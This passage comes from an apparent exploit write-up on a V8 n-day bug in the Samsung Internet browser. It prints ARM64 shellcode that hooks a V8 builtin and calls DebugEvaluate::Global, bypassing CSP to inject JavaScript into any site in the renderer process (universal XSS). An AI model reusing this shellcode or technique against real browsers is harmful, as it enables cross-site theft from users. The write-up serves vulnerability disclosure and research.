// Builtins_ConstructFunction doesn't care about x4 and overwrites

// it immediately, so we can clobber and use it as a return register.

// This is done so lr isn't clobbered and ConstructFunction knows

// where to return

mov x4, lr

// x15 and lr were saved in patched Builtins_ConstructFunction

ldp x15, lr, [sp], #16

ret x4

At this point, we have successfully hooked Builtins_ConstructFunction and can execute arbitrary shellcode from within the uxss_sc body whenever it is invoked. For our purposes, we want to evaluate an arbitrary JavaScript string to achieve UXSS, and the first function we examined for this was Builtins_GlobalEval.

Builtins_GlobalEval takes a single String argument that it evaluates. However, it comes with some complications. One notable issue is that it checks whether the Content Security Policy (CSP) allows the use of eval:

BUILTIN(GlobalEval) {

[...]

if (!Builtins::AllowDynamicFunction(isolate, target, target_global_proxy)) {

isolate->CountUsage(v8::Isolate::kFunctionConstructorReturnedUndefined);

return ReadOnlyRoots(isolate).undefined_value();

}

This means we would need to patch the function further to ensure it never enters this if block.

Alternatively, we could replicate the calls made once the security checks pass:

BUILTIN(GlobalEval) {

[...]

DirectHandle<JSFunction> function;

ASSIGN_RETURN_FAILURE_ON_EXCEPTION(

isolate, function,

Compiler::GetFunctionFromValidatedString(

direct_handle(target->native_context(), isolate), source,

NO_PARSE_RESTRICTION, kNoSourcePosition));

RETURN_RESULT_OR_FAILURE(

isolate, Execution::Call(isolate, function, target_global_proxy, {}));

But determining the correct target value, obtaining target->native_context(), and locating the direct_handle function, just to make a proper call to Compiler::GetFunctionFromValidatedString, seemed unnecessarily cumbersome.

Instead, we found a much simpler option with no security checks: DebugEvaluate::Global. This function is used by the DevTools console to evaluate JavaScript entered there.

For our needs, it is straightforward to call:

MaybeDirectHandle<Object> DebugEvaluate::Global(Isolate* isolate,

Handle<String> source,

debug::EvaluateGlobalMode mode,

REPLMode repl_mode);

We must supply the isolate pointer, a String object containing our XSS payload as source, and the mode and repl_mode values, which are simple enum literals.

To obtain the isolate pointer within our shellcode, we call Isolate::TryGetCurrent(), which returns the current isolate. To construct a valid String object holding our payload, we call v8::String::NewFromUtf8. This function takes four arguments: the isolate, the string bytes as data, an enum literal specifying the string type, and length, which is the size of the data buffer.

The resulting shellcode that executes our XSS payload looks like this:

// get isolate ptr, v8::Isolate::TryGetCurrent(0x9ba3bd0)

movz x1, #0xf7a0

movk x1, #0x0071, lsl #16

add x9, x12, x1

movz x1, #0x5ac8

movk x1, #0x054f, lsl #16

add x0, x12, x1

blr x9

// *x0 is isolate pointer

// store isolate ptr to stack

ldr x13, [x0]

str x13, [sp, #-16]!

// store x10 = v8::String::NewFromUtf8

movz x1, #0x1140

movk x1, #0x0242, lsl #16

sub x10, x12, x1

// mmap a RW page for our xss payload

mov x0, #0

mov x1, #{page_align(len(XSS_PAYLOAD))}

mov x2, #3

mov x3, #34

mov x4, #-1

mov x5, #0

mov x8, #222

svc #0

// write our xss payload to mmapped rw page

{write_str(XSS_PAYLOAD, "x0")}

// store x11 = XSS_PAYLOAD string

mov x11, x0

// pop back isolate pointer

ldr x13, [sp], #16

// at this point:

// x13 = isolate *

// x11 = XSS_PAYLOAD string mmapped region

// x10 = v8::String::NewFromUtf8

// call v8::String::NewFromUtf8 with our xss_payload

// arg0 = isolate *

mov x0, x13

// arg1 = char *c_str

mov x1, x11

// arg2 = type = kNormal

mov x2, #0

// arg3 = length

mov w3, #{len(XSS_PAYLOAD)}

// call NewFromUtf8

blr x10

// store x14 = String XSS_PAYLOAD

mov x14, x0

// store x9 = v8::internal::DebugEvaluate::Global

movz x1, #0xe44c

movk x1, #0x014e, lsl #16

sub x9, x12, x1

// call v8::internal::DebugEvaluate::Global

// arg0 = isolate *

mov x0, x13

// arg1 = String *source

mov x1, x14

// arg2 = mode = kDefault

mov x2, #0

// arg3 = repl_mode = kYes

mov x3, #0

blr x9
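The movz/movk pairs in these snippets build constants 16 bits at a time, which are then added to or subtracted from x12 (which appears to hold a base address set up outside the code shown). A small sketch of how the chunks combine, with a helper name of our own and BigInt to stay exact for 64-bit values:

```javascript
// chunks[i] is the 16-bit immediate placed at bit position 16 * i
// (movz for the first chunk, movk with lsl #16, #32, ... for the rest).
function composeImmediate(chunks) {
  return chunks.reduce((acc, chunk, i) => acc | (BigInt(chunk) << BigInt(16 * i)), 0n);
}

// Offset used for the first call in the snippet above.
console.log(composeImmediate([0xf7a0, 0x0071]).toString(16)); // 71f7a0
// Page mask built in the earlier patching shellcode.
console.log(composeImmediate([0xf000, 0xffff, 0xffff]).toString(16)); // fffffffff000
```

These offsets are specific to the analyzed libterrace.so build and would need to be recomputed for any other version.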

UXSS Demo

Below is a demo that executes the following UXSS payload: alert(document.domain); window.location.href = "https://cor.team/";.

Conclusion

Given the complex nature of the modern software ecosystem, it is unsurprising to find out-of-date core libraries in popular applications. Samsung Internet relied on a six-month-old version of V8, a JavaScript engine where researchers frequently discover new vulnerabilities, giving us a large window for n-day exploitation.

While renderer bugs are usually chained with another exploit such as a sandbox escape, we pushed the capabilities of the bug by targeting the weaker Site Isolation mechanism on mobile. As most web pages ran in the same process, we could inject shellcode into the JavaScript interpreter to achieve universal XSS in the Samsung Internet browser.